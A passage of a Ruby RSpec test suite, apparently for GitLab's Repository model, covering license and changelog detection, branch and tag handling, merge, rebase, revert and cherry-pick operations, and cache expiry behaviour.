allow(RepositoryRemoveRemoteWorker).to receive(:perform_async).and_return('1234')
end
it 'returns job_id' do
expect(repository.async_remove_remote('joe')).to eq('1234')
end
end
context 'when worker does not schedule successfully' do
before do
allow(RepositoryRemoveRemoteWorker).to receive(:perform_async).and_return(nil)
end
it 'returns nil' do
expect(Rails.logger).to receive(:info).with("Remove remote job failed to create for #{project.id} with remote name joe.")
expect(repository.async_remove_remote('joe')).to be_nil
end
end
end
describe '#fetch_ref' do
let(:broken_repository) { create(:project, :broken_storage).repository }
describe 'when storage is broken', :broken_storage do
it 'raises a storage error' do
expect_to_raise_storage_error do
broken_repository.fetch_ref(broken_repository, source_ref: '1', target_ref: '2')
end
end
end
end
describe '#get_raw_changes' do
context 'with non-UTF8 bytes in paths' do
let(:old_rev) { 'd0888d297eadcd7a345427915c309413b1231e65' }
let(:new_rev) { '19950f03c765f7ac8723a73a0599764095f52fc0' }
let(:changes) { repository.raw_changes_between(old_rev, new_rev) }
it 'returns the changes' do
expect { changes }.not_to raise_error
expect(changes.first.new_path.bytes).to eq("hello\x80world".bytes)
end
end
end
describe '#create_ref' do
it 'redirects the call to write_ref' do
ref, ref_path = '1', '2'
expect(repository.raw_repository).to receive(:write_ref).with(ref_path, ref)
repository.create_ref(ref, ref_path)
end
end
describe "#changelog", :use_clean_rails_memory_store_caching do
it 'accepts changelog' do
expect(repository.tree).to receive(:blobs).and_return([TestBlob.new('changelog')])
expect(repository.changelog.path).to eq('changelog')
end
it 'accepts news instead of changelog' do
expect(repository.tree).to receive(:blobs).and_return([TestBlob.new('news')])
expect(repository.changelog.path).to eq('news')
end
it 'accepts history instead of changelog' do
expect(repository.tree).to receive(:blobs).and_return([TestBlob.new('history')])
expect(repository.changelog.path).to eq('history')
end
it 'accepts changes instead of changelog' do
expect(repository.tree).to receive(:blobs).and_return([TestBlob.new('changes')])
expect(repository.changelog.path).to eq('changes')
end
it 'is case-insensitive' do
expect(repository.tree).to receive(:blobs).and_return([TestBlob.new('CHANGELOG')])
expect(repository.changelog.path).to eq('CHANGELOG')
end
end
describe "#license_blob", :use_clean_rails_memory_store_caching do
before do
repository.delete_file(
user, 'LICENSE', message: 'Remove LICENSE', branch_name: 'master')
end
it 'handles when HEAD points to non-existent ref' do
repository.create_file(
user, 'LICENSE', 'Copyright!',
message: 'Add LICENSE', branch_name: 'master')
allow(repository).to receive(:root_ref).and_raise(Gitlab::Git::Repository::NoRepository)
expect(repository.license_blob).to be_nil
end
it 'looks in the root_ref only' do
repository.delete_file(user, 'LICENSE',
message: 'Remove LICENSE', branch_name: 'markdown')
repository.create_file(user, 'LICENSE',
Licensee::License.new('mit').content,
message: 'Add LICENSE', branch_name: 'markdown')
expect(repository.license_blob).to be_nil
end
it 'detects license file with no recognizable open-source license content' do
repository.create_file(user, 'LICENSE', 'Copyright!',
message: 'Add LICENSE', branch_name: 'master')
expect(repository.license_blob.path).to eq('LICENSE')
end
%w[LICENSE LICENCE LiCensE LICENSE.md LICENSE.foo COPYING COPYING.md].each do |filename|
it "detects '#{filename}'" do
repository.create_file(user, filename,
Licensee::License.new('mit').content,
message: "Add #{filename}", branch_name: 'master')
expect(repository.license_blob.name).to eq(filename)
end
end
end
describe '#license_key', :use_clean_rails_memory_store_caching do
before do
repository.delete_file(user, 'LICENSE',
message: 'Remove LICENSE', branch_name: 'master')
end
it 'returns nil when no license is detected' do
expect(repository.license_key).to be_nil
end
it 'returns nil when the repository does not exist' do
expect(repository).to receive(:exists?).and_return(false)
expect(repository.license_key).to be_nil
end
it 'returns nil when the content is not recognizable' do
repository.create_file(user, 'LICENSE', 'Gitlab B.V.',
message: 'Add LICENSE', branch_name: 'master')
expect(repository.license_key).to be_nil
end
it 'returns nil when the commit SHA does not exist' do
allow(repository.head_commit).to receive(:sha).and_return('1' * 40)
expect(repository.license_key).to be_nil
end
it 'returns nil when master does not exist' do
repository.rm_branch(user, 'master')
expect(repository.license_key).to be_nil
end
it 'returns the license key' do
repository.create_file(user, 'LICENSE',
Licensee::License.new('mit').content,
message: 'Add LICENSE', branch_name: 'master')
expect(repository.license_key).to eq('mit')
end
end
describe '#license' do
before do
repository.delete_file(user, 'LICENSE',
message: 'Remove LICENSE', branch_name: 'master')
end
it 'returns nil when no license is detected' do
expect(repository.license).to be_nil
end
it 'returns nil when the repository does not exist' do
expect(repository).to receive(:exists?).and_return(false)
expect(repository.license).to be_nil
end
it 'returns nil when the content is not recognizable' do
repository.create_file(user, 'LICENSE', 'Gitlab B.V.',
message: 'Add LICENSE', branch_name: 'master')
expect(repository.license).to be_nil
end
it 'returns the license' do
license = Licensee::License.new('mit')
repository.create_file(user, 'LICENSE',
license.content,
message: 'Add LICENSE', branch_name: 'master')
expect(repository.license).to eq(license)
end
end
describe "#gitlab_ci_yml", :use_clean_rails_memory_store_caching do
it 'returns valid file' do
files = [TestBlob.new('file'), TestBlob.new('.gitlab-ci.yml'), TestBlob.new('copying')]
expect(repository.tree).to receive(:blobs).and_return(files)
expect(repository.gitlab_ci_yml.path).to eq('.gitlab-ci.yml')
end
it 'returns nil if not exists' do
expect(repository.tree).to receive(:blobs).and_return([])
expect(repository.gitlab_ci_yml).to be_nil
end
it 'returns nil for empty repository' do
allow(repository).to receive(:root_ref).and_raise(Gitlab::Git::Repository::NoRepository)
expect(repository.gitlab_ci_yml).to be_nil
end
end
describe '#ambiguous_ref?' do
let(:ref) { 'ref' }
subject { repository.ambiguous_ref?(ref) }
context 'when ref is ambiguous' do
before do
repository.add_tag(project.creator, ref, 'master')
repository.add_branch(project.creator, ref, 'master')
end
it 'is true' do
is_expected.to eq(true)
end
end
context 'when ref is not ambiguous' do
before do
repository.add_tag(project.creator, ref, 'master')
end
it 'is false' do
is_expected.to eq(false)
end
end
end
describe '#expand_ref' do
let(:ref) { 'ref' }
subject { repository.expand_ref(ref) }
context 'when ref is not tag or branch name' do
let(:ref) { 'refs/heads/master' }
it 'returns nil' do
is_expected.to be_nil
end
end
context 'when ref is tag name' do
before do
repository.add_tag(project.creator, ref, 'master')
end
it 'returns the tag ref' do
is_expected.to eq("refs/tags/#{ref}")
end
end
context 'when ref is branch name' do
before do
repository.add_branch(project.creator, ref, 'master')
end
it 'returns the branch ref' do
is_expected.to eq("refs/heads/#{ref}")
end
end
end
describe '#add_branch' do
let(:branch_name) { 'new_feature' }
let(:target) { 'master' }
subject { repository.add_branch(user, branch_name, target) }
it "calls Gitaly's OperationService" do
expect_any_instance_of(Gitlab::GitalyClient::OperationService)
.to receive(:user_create_branch).with(branch_name, user, target)
.and_return(nil)
subject
end
it 'creates the branch' do
expect(subject.name).to eq(branch_name)
expect(repository.find_branch(branch_name)).not_to be_nil
end
context 'with a non-existing target' do
let(:target) { 'fake-target' }
it "returns false and doesn't create the branch" do
expect(subject).to be(false)
expect(repository.find_branch(branch_name)).to be_nil
end
end
end
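# Shared examples for boolean predicates with "asymmetric" caching: a truthy
# result is cached both per-request (RequestStore) and persistently
# (RepositoryCache), while a falsy result is only cached per-request.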
shared_examples 'asymmetric cached method' do |method|
context 'asymmetric caching', :use_clean_rails_memory_store_caching, :request_store do
let(:cache) { repository.send(:cache) }
let(:request_store_cache) { repository.send(:request_store_cache) }
context 'when it returns true' do
before do
expect(repository.raw_repository).to receive(method).once.and_return(true)
end
it 'caches the output in RequestStore' do
expect do
repository.send(method)
end.to change { request_store_cache.read(method) }.from(nil).to(true)
end
it 'caches the output in RepositoryCache' do
expect do
repository.send(method)
end.to change { cache.read(method) }.from(nil).to(true)
end
end
context 'when it returns false' do
before do
expect(repository.raw_repository).to receive(method).once.and_return(false)
end
it 'caches the output in RequestStore' do
expect do
repository.send(method)
end.to change { request_store_cache.read(method) }.from(nil).to(false)
end
it 'does NOT cache the output in RepositoryCache' do
expect do
repository.send(method)
end.not_to change { cache.read(method) }.from(nil)
end
end
end
end
describe '#exists?' do
it 'returns true when a repository exists' do
expect(repository.exists?).to be(true)
end
it 'returns false if no full path can be constructed' do
allow(repository).to receive(:full_path).and_return(nil)
expect(repository.exists?).to be(false)
end
context 'with broken storage', :broken_storage do
it 'raises a storage error' do
expect_to_raise_storage_error { broken_repository.exists? }
end
end
it_behaves_like 'asymmetric cached method', :exists?
end
describe '#has_visible_content?' do
it 'delegates to raw_repository when true' do
expect(repository.raw_repository).to receive(:has_visible_content?)
.and_return(true)
expect(repository.has_visible_content?).to eq(true)
end
it 'delegates to raw_repository when false' do
expect(repository.raw_repository).to receive(:has_visible_content?)
.and_return(false)
expect(repository.has_visible_content?).to eq(false)
end
it_behaves_like 'asymmetric cached method', :has_visible_content?
end
describe '#branch_exists?' do
let(:branch) { repository.root_ref }
subject { repository.branch_exists?(branch) }
it 'delegates to branch_names when the cache is empty' do
repository.expire_branches_cache
expect(repository).to receive(:branch_names).and_call_original
is_expected.to eq(true)
end
it 'uses redis set caching when the cache is filled' do
repository.branch_names # ensure the branch name cache is filled
expect(repository)
.to receive(:branch_names_include?)
.with(branch)
.and_call_original
is_expected.to eq(true)
end
end
describe '#tag_exists?' do
let(:tag) { repository.tags.first.name }
subject { repository.tag_exists?(tag) }
it 'delegates to tag_names when the cache is empty' do
repository.expire_tags_cache
expect(repository).to receive(:tag_names).and_call_original
is_expected.to eq(true)
end
it 'uses redis set caching when the cache is filled' do
repository.tag_names # ensure the tag name cache is filled
expect(repository)
.to receive(:tag_names_include?)
.with(tag)
.and_call_original
is_expected.to eq(true)
end
end
describe '#branch_names', :clean_gitlab_redis_cache do
let(:fake_branch_names) { ['foobar'] }
it 'gets cached across Repository instances' do
allow(repository.raw_repository).to receive(:branch_names).once.and_return(fake_branch_names)
expect(repository.branch_names).to match_array(fake_branch_names)
fresh_repository = Project.find(project.id).repository
expect(fresh_repository.object_id).not_to eq(repository.object_id)
expect(fresh_repository.raw_repository).not_to receive(:branch_names)
expect(fresh_repository.branch_names).to match_array(fake_branch_names)
end
end
describe '#empty?' do
let(:empty_repository) { create(:project_empty_repo).repository }
it 'returns true for an empty repository' do
expect(empty_repository).to be_empty
end
it 'returns false for a non-empty repository' do
expect(repository).not_to be_empty
end
it 'caches the output' do
expect(repository.raw_repository).to receive(:has_visible_content?).once
repository.empty?
repository.empty?
end
end
describe '#blobs_at' do
let(:empty_repository) { create(:project_empty_repo).repository }
it 'returns empty array for an empty repository' do
# rubocop:disable Style/WordArray
expect(empty_repository.blobs_at(['master', 'foobar'])).to eq([])
# rubocop:enable Style/WordArray
end
it 'returns blob array for a non-empty repository' do
repository.create_file(User.last, 'foobar', 'CONTENT', message: 'message', branch_name: 'master')
# rubocop:disable Style/WordArray
blobs = repository.blobs_at([['master', 'foobar']])
# rubocop:enable Style/WordArray
expect(blobs.first.name).to eq('foobar')
expect(blobs.size).to eq(1)
end
end
describe '#root_ref' do
it 'returns a branch name' do
expect(repository.root_ref).to be_an_instance_of(String)
end
it 'caches the output' do
expect(repository.raw_repository).to receive(:root_ref)
.once
.and_return('master')
repository.root_ref
repository.root_ref
end
it 'returns nil if the repository does not exist' do
repository = create(:project).repository
expect(repository).not_to be_exists
expect(repository.root_ref).to be_nil
end
it_behaves_like 'asymmetric cached method', :root_ref
end
describe '#expire_root_ref_cache' do
it 'expires the root reference cache' do
repository.root_ref
expect(repository.raw_repository).to receive(:root_ref)
.once
.and_return('foo')
repository.expire_root_ref_cache
expect(repository.root_ref).to eq('foo')
end
end
describe '#expire_branch_cache' do
# This method is private but we need it for testing purposes. Sadly there's
# no other proper way of testing caching operations.
let(:cache) { repository.send(:cache) }
it 'expires the cache for all branches' do
expect(cache).to receive(:expire)
.at_least(repository.branches.length * 2)
.times
repository.expire_branch_cache
end
it 'expires the cache for all branches when the root branch is given' do
expect(cache).to receive(:expire)
.at_least(repository.branches.length * 2)
.times
repository.expire_branch_cache(repository.root_ref)
end
it 'expires the cache for a specific branch' do
expect(cache).to receive(:expire).twice
repository.expire_branch_cache('foo')
end
end
describe '#expire_emptiness_caches' do
let(:cache) { repository.send(:cache) }
it 'expires the caches for an empty repository' do
allow(repository).to receive(:empty?).and_return(true)
expect(cache).to receive(:expire).with(:has_visible_content?)
repository.expire_emptiness_caches
end
it 'does not expire the cache for a non-empty repository' do
allow(repository).to receive(:empty?).and_return(false)
expect(cache).not_to receive(:expire).with(:has_visible_content?)
repository.expire_emptiness_caches
end
it 'expires the memoized repository cache' do
allow(repository.raw_repository).to receive(:expire_has_local_branches_cache).and_call_original
repository.expire_emptiness_caches
end
end
describe 'skip_merges option' do
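# The ref below points at a branch literally named 'test', quotes included,
# hence the nested quoting.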
subject { repository.commits(Gitlab::Git::BRANCH_REF_PREFIX + "'test'", limit: 100, skip_merges: true).map { |k| k.id } }
it { is_expected.not_to include('e56497bb5f03a90a51293fc6d516788730953899') }
end
describe '#merge' do
let(:merge_request) { create(:merge_request, source_branch: 'feature', target_branch: 'master', source_project: project) }
let(:message) { "Test \r\n\r\n message" }
it 'merges the code and returns the commit id' do
expect(merge_commit).to be_present
expect(repository.blob_at(merge_commit.id, 'files/ruby/feature.rb')).to be_present
end
it 'sets the `in_progress_merge_commit_sha` flag for the given merge request' do
merge_commit_id = merge(repository, user, merge_request, message)
expect(merge_request.in_progress_merge_commit_sha).to eq(merge_commit_id)
end
it 'removes carriage returns from commit message' do
merge_commit_id = merge(repository, user, merge_request, message)
expect(repository.commit(merge_commit_id).message).to eq(message.delete("\r"))
end
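# Merges the merge request's diff head into the repository and returns the
# merge commit SHA.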
def merge(repository, user, merge_request, message)
repository.merge(user, merge_request.diff_head_sha, merge_request, message)
end
end
describe '#merge_to_ref' do
let(:merge_request) do
create(:merge_request, source_branch: 'feature',
target_branch: 'master',
source_project: project)
end
it 'writes merge of source SHA and first parent ref to MR merge_ref_path' do
merge_commit_id = repository.merge_to_ref(user,
merge_request.diff_head_sha,
merge_request,
merge_request.merge_ref_path,
'Custom message',
merge_request.target_branch_ref)
merge_commit = repository.commit(merge_commit_id)
expect(merge_commit.message).to eq('Custom message')
expect(merge_commit.author_name).to eq(user.name)
expect(merge_commit.author_email).to eq(user.commit_email)
expect(repository.blob_at(merge_commit.id, 'files/ruby/feature.rb')).to be_present
end
end
describe '#ff_merge' do
before do
repository.add_branch(user, 'ff-target', 'feature~5')
end
it 'merges the code and return the commit id' do
merge_request = create(:merge_request, source_branch: 'feature', target_branch: 'ff-target', source_project: project)
merge_commit_id = repository.ff_merge(user,
merge_request.diff_head_sha,
merge_request.target_branch,
merge_request: merge_request)
merge_commit = repository.commit(merge_commit_id)
expect(merge_commit).to be_present
expect(repository.blob_at(merge_commit.id, 'files/ruby/feature.rb')).to be_present
end
it 'sets the `in_progress_merge_commit_sha` flag for the given merge request' do
merge_request = create(:merge_request, source_branch: 'feature', target_branch: 'ff-target', source_project: project)
merge_commit_id = repository.ff_merge(user,
merge_request.diff_head_sha,
merge_request.target_branch,
merge_request: merge_request)
expect(merge_request.in_progress_merge_commit_sha).to eq(merge_commit_id)
end
end
describe '#rebase' do
let(:merge_request) { create(:merge_request, source_branch: 'feature', target_branch: 'master', source_project: project) }
shared_examples_for 'a method that can rebase successfully' do
it 'returns the rebase commit sha' do
rebase_commit_sha = repository.rebase(user, merge_request)
head_sha = merge_request.source_project.repository.commit(merge_request.source_branch).sha
expect(rebase_commit_sha).to eq(head_sha)
end
it 'sets the `rebase_commit_sha` for the given merge request' do
rebase_commit_sha = repository.rebase(user, merge_request)
expect(rebase_commit_sha).not_to be_nil
expect(merge_request.rebase_commit_sha).to eq(rebase_commit_sha)
end
end
it_behaves_like 'a method that can rebase successfully'
it 'executes the new Gitaly RPC' do
expect_any_instance_of(Gitlab::GitalyClient::OperationService).to receive(:rebase)
repository.rebase(user, merge_request)
end
describe 'rolling back the `rebase_commit_sha`' do
let(:new_sha) { Digest::SHA1.hexdigest('foo') }
it 'does not rollback when there are no errors' do
second_response = double(pre_receive_error: nil, git_error: nil)
mock_gitaly(second_response)
repository.rebase(user, merge_request)
expect(merge_request.reload.rebase_commit_sha).to eq(new_sha)
end
it 'does rollback when a PreReceiveError is encountered in the second step' do
second_response = double(pre_receive_error: 'my_error', git_error: nil)
mock_gitaly(second_response)
expect do
repository.rebase(user, merge_request)
end.to raise_error(Gitlab::Git::PreReceiveError)
expect(merge_request.reload.rebase_commit_sha).to be_nil
end
it 'does rollback when a GitError is encountered in the second step' do
second_response = double(pre_receive_error: nil, git_error: 'git error')
mock_gitaly(second_response)
expect do
repository.rebase(user, merge_request)
end.to raise_error(Gitlab::Git::Repository::GitError)
expect(merge_request.reload.rebase_commit_sha).to be_nil
end
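# Stubs the two-step (confirmable) Gitaly rebase RPC: the first response
# carries the rebase SHA, the second either confirms success or reports a
# pre-receive/git error.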
def mock_gitaly(second_response)
responses = [
double(rebase_sha: new_sha).as_null_object,
second_response
]
expect_any_instance_of(
Gitaly::OperationService::Stub
).to receive(:user_rebase_confirmable).and_return(responses.each)
end
end
end
describe '#revert' do
let(:new_image_commit) { repository.commit('33f3729a45c02fc67d00adb1b8bca394b0e761d9') }
let(:update_image_commit) { repository.commit('2f63565e7aac07bcdadb654e253078b727143ec4') }
let(:message) { 'revert message' }
context 'when there is a conflict' do
it 'raises an error' do
expect { repository.revert(user, new_image_commit, 'master', message) }.to raise_error(Gitlab::Git::Repository::CreateTreeError)
end
end
context 'when commit was already reverted' do
it 'raises an error' do
repository.revert(user, update_image_commit, 'master', message)
expect { repository.revert(user, update_image_commit, 'master', message) }.to raise_error(Gitlab::Git::Repository::CreateTreeError)
end
end
context 'when commit can be reverted' do
it 'reverts the changes' do
expect(repository.revert(user, update_image_commit, 'master', message)).to be_truthy
end
end
context 'reverting a merge commit' do
it 'reverts the changes' do
merge_commit
expect(repository.blob_at_branch('master', 'files/ruby/feature.rb')).to be_present
repository.revert(user, merge_commit, 'master', message)
expect(repository.blob_at_branch('master', 'files/ruby/feature.rb')).not_to be_present
end
end
end
describe '#cherry_pick' do
let(:conflict_commit) { repository.commit('c642fe9b8b9f28f9225d7ea953fe14e74748d53b') }
let(:pickable_commit) { repository.commit('7d3b0f7cff5f37573aea97cebfd5692ea1689924') }
let(:pickable_merge) { repository.commit('e56497bb5f03a90a51293fc6d516788730953899') }
let(:message) { 'cherry-pick message' }
context 'when there is a conflict' do
it 'raises an error' do
expect { repository.cherry_pick(user, conflict_commit, 'master', message) }.to raise_error(Gitlab::Git::Repository::CreateTreeError)
end
end
context 'when commit was already cherry-picked' do
it 'raises an error' do
repository.cherry_pick(user, pickable_commit, 'master', message)
expect { repository.cherry_pick(user, pickable_commit, 'master', message) }.to raise_error(Gitlab::Git::Repository::CreateTreeError)
end
end
context 'when commit can be cherry-picked' do
it 'cherry-picks the changes' do
expect(repository.cherry_pick(user, pickable_commit, 'master', message)).to be_truthy
end
end
context 'cherry-picking a merge commit' do
it 'cherry-picks the changes' do
expect(repository.blob_at_branch('improve/awesome', 'foo/bar/.gitkeep')).to be_nil
cherry_pick_commit_sha = repository.cherry_pick(user, pickable_merge, 'improve/awesome', message)
cherry_pick_commit_message = project.commit(cherry_pick_commit_sha).message
expect(repository.blob_at_branch('improve/awesome', 'foo/bar/.gitkeep')).not_to be_nil
expect(cherry_pick_commit_message).to eq(message)
end
end
end
describe '#before_delete' do
describe 'when a repository does not exist' do
before do
allow(repository).to receive(:exists?).and_return(false)
end
it 'does not flush caches that depend on repository data' do
expect(repository).not_to receive(:expire_cache)
repository.before_delete
end
it 'flushes the tags cache' do
expect(repository).to receive(:expire_tags_cache)
repository.before_delete
end
it 'flushes the branches cache' do
expect(repository).to receive(:expire_branches_cache)
repository.before_delete
end
it 'flushes the root ref cache' do
expect(repository).to receive(:expire_root_ref_cache)
repository.before_delete
end
it 'flushes the emptiness caches' do
expect(repository).to receive(:expire_emptiness_caches)
repository.before_delete
end
it 'flushes the exists cache' do
expect(repository).to receive(:expire_exists_cache).twice
repository.before_delete
end
end
describe 'when a repository exists' do
before do
allow(repository).to receive(:exists?).and_return(true)
end
it 'flushes the tags cache' do
expect(repository).to receive(:expire_tags_cache)
repository.before_delete
end
it 'flushes the branches cache' do
expect(repository).to receive(:expire_branches_cache)
repository.before_delete
end
it 'flushes the root ref cache' do
expect(repository).to receive(:expire_root_ref_cache)
repository.before_delete
end
it 'flushes the emptiness caches' do
expect(repository).to receive(:expire_emptiness_caches)
repository.before_delete
end
end
end
describe '#before_change_head' do
it 'flushes the branch cache' do
expect(repository).to receive(:expire_branch_cache)
repository.before_change_head
end
it 'flushes the root ref cache' do
expect(repository).to receive(:expire_root_ref_cache)
repository.before_change_head
end
end
describe '#after_change_head' do
it 'flushes the method caches' do
expect(repository).to receive(:expire_method_caches).with([
:size,
:commit_count,
:rendered_readme,
:readme_path,
:contribution_guide,
:changelog,
:license_blob,
:license_key,
:gitignore,
:gitlab_ci_yml,
:branch_names,
:tag_names,
:branch_count,
:tag_count,
:avatar,
:exists?,
:root_ref,
:merged_branch_names,
:has_visible_content?,
:issue_template_names,
:merge_request_template_names,
:metrics_dashboard_paths,
:xcode_project?
])
repository.after_change_head
end
end
describe '#expires_caches_for_tags' do
it 'flushes the cache' do
expect(repository).to receive(:expire_statistics_caches)
expect(repository).to receive(:expire_emptiness_caches)
expect(repository).to receive(:expire_tags_cache)
repository.expire_caches_for_tags
end
end
describe '#before_push_tag' do
it 'logs an event' do
expect(repository).not_to receive(:expire_statistics_caches)
expect(repository).not_to receive(:expire_emptiness_caches)
expect(repository).not_to receive(:expire_tags_cache)
expect(repository).to receive(:repository_event).with(:push_tag)
repository.before_push_tag
end
end
describe '#after_push_commit' do
it 'expires statistics caches' do
expect(repository).to receive(:expire_statistics_caches)
.and_call_original
expect(repository).to receive(:expire_branch_cache)
.with('master')
.and_call_original
repository.after_push_commit('master')
end
end
describe '#after_create_branch' do
it 'expires the branch caches' do
expect(repository).to receive(:expire_branches_cache)
repository.after_create_branch
end
it 'does not expire the branch caches when specified' do
expect(repository).not_to receive(:expire_branches_cache)
repository.after_create_branch(expire_cache: false)
end
end
describe '#after_remove_branch' do
it 'expires the branch caches' do
expect(repository).to receive(:expire_branches_cache)
repository.after_remove_branch
end
it 'does not expire the branch caches when specified' do
expect(repository).not_to receive(:expire_branches_cache)
repository.after_remove_branch(expire_cache: false)
end
end
describe '#after_create' do
it 'calls expire_status_cache' do
expect(repository).to receive(:expire_status_cache)
repository.after_create
end
it 'logs an event' do
expect(repository).to receive(:repository_event).with(:create_repository)
repository.after_create
end
end
describe '#expire_status_cache' do
it 'flushes the exists cache' do
expect(repository).to receive(:expire_exists_cache)
repository.expire_status_cache
end
it 'flushes the root ref cache' do
expect(repository).to receive(:expire_root_ref_cache)
repository.expire_status_cache
end
it 'flushes the emptiness caches' do
expect(repository).to receive(:expire_emptiness_caches)
repository.expire_status_cache
end
end
describe "#copy_gitattributes" do
it 'returns true with a valid ref' do
expect(repository.copy_gitattributes('master')).to be_truthy
end
it 'returns false with an invalid ref' do
expect(repository.copy_gitattributes('invalid')).to be_falsey
end
end
describe '#before_remove_tag' do
it 'flushes the tag cache' do
expect(repository).to receive(:expire_tags_cache).and_call_original
expect(repository).to receive(:expire_statistics_caches).and_call_original
repository.before_remove_tag
end
end
describe '#branch_count' do
it 'returns the number of branches' do
expect(repository.branch_count).to be_an(Integer)
rugged_count = rugged_repo(repository).branches.count
expect(repository.branch_count).to eq(rugged_count)
end
end
describe '#tag_count' do
it 'returns the number of tags' do
expect(repository.tag_count).to be_an(Integer)
rugged_count = rugged_repo(repository).tags.count
expect(repository.tag_count).to eq(rugged_count)
end
end
describe '#expire_branches_cache' do
it 'expires the cache' do
expect(repository).to receive(:expire_method_caches)
.with(%i(branch_names merged_branch_names branch_count has_visible_content?))
.and_call_original
repository.expire_branches_cache
end
end
describe '#expire_tags_cache' do
it 'expires the cache' do
expect(repository).to receive(:expire_method_caches)
.with(%i(tag_names tag_count))
.and_call_original
repository.expire_tags_cache
end
end
describe '#add_tag' do
let(:user) { build_stubbed(:user) }
context 'with a valid target' do
it 'creates the tag' do
repository.add_tag(user, '8.5', 'master', 'foo')
tag = repository.find_tag('8.5')
expect(tag).to be_present
expect(tag.message).to eq('foo')
expect(tag.dereferenced_target.id).to eq(repository.commit('master').id)
end
it 'returns a Gitlab::Git::Tag object' do
tag = repository.add_tag(user, '8.5', 'master', 'foo')
expect(tag).to be_a(Gitlab::Git::Tag)
end
end
context 'with an invalid target' do
it 'returns false' do
expect(repository.add_tag(user, '8.5', 'bar', 'foo')).to be false
end
end
end
describe '#rm_branch' do
it 'removes a branch' do
expect(repository).to receive(:before_remove_branch)
expect(repository).to receive(:after_remove_branch)
repository.rm_branch(user, 'feature')
end
context 'when pre hooks failed' do
before do
allow_any_instance_of(Gitlab::GitalyClient::OperationService)
.to receive(:user_delete_branch).and_raise(Gitlab::Git::PreReceiveError)
end
it 'gets an error and does not delete the branch' do
expect do
repository.rm_branch(user, 'feature')
end.to raise_error(Gitlab::Git::PreReceiveError)
expect(repository.find_branch('feature')).not_to be_nil
end
end
end
describe '#rm_tag' do
it 'removes a tag' do
expect(repository).to receive(:before_remove_tag)
repository.rm_tag(build_stubbed(:user), 'v1.1.0')
expect(repository.find_tag('v1.1.0')).to be_nil
end
end
describe '#avatar' do
it 'returns nil if repo does not exist' do
allow(repository).to receive(:root_ref).and_raise(Gitlab::Git::Repository::NoRepository)
expect(repository.avatar).to be_nil
end
it 'returns the first avatar file found in the repository' do
expect(repository).to receive(:file_on_head)
.with(:avatar)
.and_return(double(:tree, path: 'logo.png'))
expect(repository.avatar).to eq('logo.png')
end
it 'caches the output' do
expect(repository).to receive(:file_on_head)
.with(:avatar)
.once
.and_return(double(:tree, path: 'logo.png'))
2.times { expect(repository.avatar).to eq('logo.png') }
end
end
describe '#expire_exists_cache' do
let(:cache) { repository.send(:cache) }
let(:request_store_cache) { repository.send(:request_store_cache) }
it 'expires the cache' do
expect(cache).to receive(:expire).with(:exists?)
repository.expire_exists_cache
end
it 'expires the request store cache', :request_store do
expect(request_store_cache).to receive(:expire).with(:exists?)
repository.expire_exists_cache
end
end
describe '#xcode_project?' do
before do
allow(repository).to receive(:tree).with(:head).and_return(double(:tree, trees: [tree]))
end
context 'when the root contains a *.xcodeproj directory' do
let(:tree) { double(:tree, path: 'Foo.xcodeproj') }
it 'returns true' do
expect(repository.xcode_project?).to be_truthy
end
end
context 'when the root contains a *.xcworkspace directory' do
let(:tree) { double(:tree, path: 'Foo.xcworkspace') }
it 'returns true' do
expect(repository.xcode_project?).to be_truthy
end
end
context 'when the root contains no Xcode config directory' do
let(:tree) { double(:tree, path: 'Foo') }
it 'returns false' do
expect(repository.xcode_project?).to be_falsey
end
end
end
describe '#contribution_guide', :use_clean_rails_memory_store_caching do
it 'returns and caches the output' do
expect(repository).to receive(:file_on_head)
.with(:contributing)
.and_return(Gitlab::Git::Tree.new(path: 'CONTRIBUTING.md'))
.once
2.times do
expect(repository.contribution_guide)
.to be_an_instance_of(Gitlab::Git::Tree)
end
end
end
describe '#gitignore', :use_clean_rails_memory_store_caching do
it 'returns and caches the output' do
expect(repository).to receive(:file_on_head)
.with(:gitignore)
.and_return(Gitlab::Git::Tree.new(path: '.gitignore'))
.once
2.times do
expect(repository.gitignore).to be_an_instance_of(Gitlab::Git::Tree)
end
end
end
describe '#readme', :use_clean_rails_memory_store_caching do
context 'with a non-existing repository' do
let(:project) { create(:project) }
it 'returns nil' do
expect(repository.readme).to be_nil
end
end
context 'with an existing repository' do
context 'when no README exists' do
let(:project) { create(:project, :empty_repo) }
it 'returns nil' do
expect(repository.readme).to be_nil
end
end
context 'when a README exists' do
let(:project) { create(:project, :repository) }
it 'returns the README' do
expect(repository.readme).to be_an_instance_of(ReadmeBlob)
end
end
end
end
describe '#readme_path', :use_clean_rails_memory_store_caching do
context 'with a non-existing repository' do
let(:project) { create(:project) }
it 'returns nil' do
expect(repository.readme_path).to be_nil
end
end
context 'with an existing repository' do
context 'when no README exists' do
let(:project) { create(:project, :empty_repo) }
it 'returns nil' do
expect(repository.readme_path).to be_nil
end
end
context 'when a README exists' do
let(:project) { create(:project, :repository) }
it 'returns the README' do
expect(repository.readme_path).to eq("README.md")
end
it 'caches the response' do
expect(repository).to receive(:readme).and_call_original.once
2.times do
expect(repository.readme_path).to eq("README.md")
end
end
end
end
end
describe '#expire_statistics_caches' do
it 'expires the caches' do
expect(repository).to receive(:expire_method_caches)
.with(%i(size commit_count))
repository.expire_statistics_caches
end
end
describe '#expire_all_method_caches' do
it 'expires the caches of all methods' do
expect(repository).to receive(:expire_method_caches)
.with(Repository::CACHED_METHODS)
repository.expire_all_method_caches
end
it 'all cache_method definitions are in the lists of method caches' do
methods = repository.methods.map do |method|
match = /^_uncached_(.*)/.match(method)
match[1].to_sym if match
end.compact
expect(Repository::CACHED_METHODS + Repository::MEMOIZED_CACHED_METHODS).to include(*methods)
end
end
describe '#file_on_head' do
context 'with a non-existing repository' do
it 'returns nil' do
expect(repository).to receive(:tree).with(:head).and_return(nil)
expect(repository.file_on_head(:readme)).to be_nil
end
end
context 'with a repository that has no blobs' do
it 'returns nil' do
expect_any_instance_of(Tree).to receive(:blobs).and_return([])
expect(repository.file_on_head(:readme)).to be_nil
end
end
context 'with an existing repository' do
it 'returns a Gitlab::Git::Tree' do
expect(repository.file_on_head(:readme))
.to be_an_instance_of(Gitlab::Git::Tree)
end
end
end
describe '#head_tree' do
context 'with an existing repository' do
it 'returns a Tree' do
expect(repository.head_tree).to be_an_instance_of(Tree)
end
end
context 'with a non-existing repository' do
it 'returns nil' do
expect(repository).to receive(:head_commit).and_return(nil)
expect(repository.head_tree).to be_nil
end
end
end
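# Shared so the same expectations run against both the default (Gitaly) code
# path and the Rugged-enabled path below.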
shared_examples '#tree' do
context 'using a non-existing repository' do
before do
allow(repository).to receive(:head_commit).and_return(nil)
end
